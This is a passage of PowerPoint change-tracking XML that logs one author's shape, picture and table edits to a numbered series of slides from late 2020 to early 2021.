        <pc:cxnChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:10:24.445" v="8662" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:cxnSpMk id="9" creationId="{EB804EC5-9538-4194-87B4-D159A64CD2FE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:10:06.124" v="8656" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:cxnSpMk id="12" creationId="{FC584904-79F0-4569-ACEC-8B7EFD461005}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:17:57.960" v="10723"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2610968194" sldId="450"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:31.836" v="8791"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="2" creationId="{B15568D7-1884-4D23-9D4B-D2BB8A0C3DD4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:15:28.720" v="8711" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="3" creationId="{AA2460C2-D09C-4373-8FBF-2037BA25F659}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:24:50.725" v="8718" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="6" creationId="{1AA06D5F-8863-4270-AA3F-66EF92F296F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:29:06.259" v="8760" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="7" creationId="{9E2E3438-C9F3-472C-B2DA-2C820B89B0C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:15:52.108" v="8713" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:picMk id="4" creationId="{92565BD4-9D9A-4A9C-8042-784FC3CE0078}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:35:39.311" v="8798" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2826770376" sldId="451"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:34.532" v="8792"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="2" creationId="{6645E2D7-99B3-4D9C-98CD-216F1C581D4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:34:01.510" v="8765" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="3" creationId="{FCD3317A-6E90-4478-8908-28106AFE985A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:35:39.311" v="8798" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="6" creationId="{B971F1BB-67AE-4C21-BF70-417619960348}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:35:26.903" v="8796" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:picMk id="4" creationId="{8D80FE88-4B62-4D15-958C-44198343BCAB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:35.407" v="9086" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="605110631" sldId="452"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:37:25.277" v="8800"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="2" creationId="{1F07EEF5-79A7-4004-AE05-34F7CB673B02}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:19.974" v="9084" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="3" creationId="{B6FE67B4-8696-45FB-8B3A-8286C3499CEE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:43:35.407" v="9086" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="605110631" sldId="452"/>
            <ac:spMk id="4" creationId="{FCF26032-2A1B-44DF-BABC-8C8FC369C64A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:46.388" v="9096" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="629962386" sldId="453"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:46.388" v="9096" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="629962386" sldId="453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1T21:05:50.848" v="9098" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1291906013" sldId="454"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:05:50.848" v="9098" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1291906013" sldId="454"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:01.817" v="9100" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2462243918" sldId="455"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:01.817" v="9100" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2462243918" sldId="455"/>
            <ac:picMk id="4" creationId="{D3F49674-7759-4D2E-B296-D829C1E4C6B6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:05.909" v="9102" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2361623568" sldId="456"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:05.909" v="9102" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2361623568" sldId="456"/>
            <ac:picMk id="3" creationId="{01A8D313-C60B-4143-8B57-C5D10D2B4679}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:15.981" v="9106" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2011088463" sldId="457"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:15.981" v="9106" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2011088463" sldId="45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1T21:06:22.362" v="9108" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2124952347" sldId="458"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:06:22.362" v="9108" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2124952347" sldId="458"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:08:37.396" v="9169"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="557494082" sldId="459"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:07:37.163" v="9139" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="557494082" sldId="459"/>
            <ac:picMk id="2" creationId="{612AAC04-D3A1-4B6B-BE94-DF6C916F5689}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:08:33.470" v="9168" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="557494082" sldId="459"/>
            <ac:picMk id="3" creationId="{3514F424-367F-484C-99EE-A10433F1A6B0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:08:33.470" v="9168" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="557494082" sldId="459"/>
            <ac:picMk id="4" creationId="{0D646922-3257-494B-863A-AE9FD5C878D6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:11:30.566" v="9243"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3613343358" sldId="460"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:11:14.721" v="9241" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3613343358" sldId="460"/>
            <ac:picMk id="2" creationId="{A11B61FC-BD17-4CD2-B868-F49192E53028}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:11:19.739" v="9242" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3613343358" sldId="460"/>
            <ac:picMk id="3" creationId="{8BD22156-64F0-4AD6-9F66-925F1CB60001}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:27.321" v="9930" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="522130509" sldId="461"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:13:17.884" v="9381" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="522130509" sldId="461"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:27.321" v="9930" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3480610823" sldId="462"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:15:35.900" v="9559" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3480610823" sldId="462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3:11.750" v="11277" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2930044362" sldId="463"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:57:15.280" v="11256" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2930044362" sldId="463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2:57.879" v="11274" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="332447904" sldId="464"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:32:52.515" v="9916" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="332447904" sldId="464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2:51.751" v="11272" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1956652012" sldId="465"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:06.908" v="9924" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1956652012" sldId="46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2T10:33:21.707" v="9929" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3787008638" sldId="466"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T10:33:21.707" v="9929" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3787008638" sldId="466"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:08.571" v="11004" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="986747498" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:31:06.065" v="10760" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="2" creationId="{439F6EC3-8D33-457B-9D19-B33A0C69F604}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:36:23.201" v="10997" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="3" creationId="{3A80017C-65A0-44F9-AC81-9872FD2035FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:33:08.994" v="10934"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="4" creationId="{03E3BEDF-701B-4635-B65E-373D1B306D3D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:08.571" v="11004" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="986747498" sldId="467"/>
            <ac:spMk id="6" creationId="{C3C90AF7-4C08-4DCF-B108-0D2503F28380}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-06T11:23:07.114" v="11276" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1775983338" sldId="468"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:57:11.616" v="11252" actId="313"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1775983338" sldId="468"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{403CD443-E91A-46E8-AB30-E0CEB57CEF69}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{403CD443-E91A-46E8-AB30-E0CEB57CEF69}" dt="2020-10-22T19:17:34.621" v="39" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{403CD443-E91A-46E8-AB30-E0CEB57CEF69}" dt="2020-10-22T19:17:34.621" v="39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403CD443-E91A-46E8-AB30-E0CEB57CEF69}" dt="2020-10-22T19:17:29.905" v="38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403CD443-E91A-46E8-AB30-E0CEB57CEF69}" dt="2020-10-22T19:17:34.621" v="39" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4073586220" sldId="256"/>
            <ac:spMk id="3" creationId="{A705490D-FDBC-4842-87D1-73577E6541F1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:28:48.836" v="2448"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2692560093" sldId="379"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-09T21:07:02.629" v="308"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1173228883" sldId="380"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-09T21:05:44.694" v="260" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173228883" sldId="380"/>
            <ac:spMk id="3" creationId="{CFEA4607-FE9F-487B-A05E-5E3CDEAACDDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2648658250" sldId="438"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:32.496" v="2476"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2648658250" sldId="438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ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-18T16:37:18.111" v="2431" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="480636073" sldId="444"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{ACA457F1-0CA4-42A5-8FE0-67BCCDE12775}" dt="2021-02-25T09:44:28.854" v="2475"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="629962386" sldId="453"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
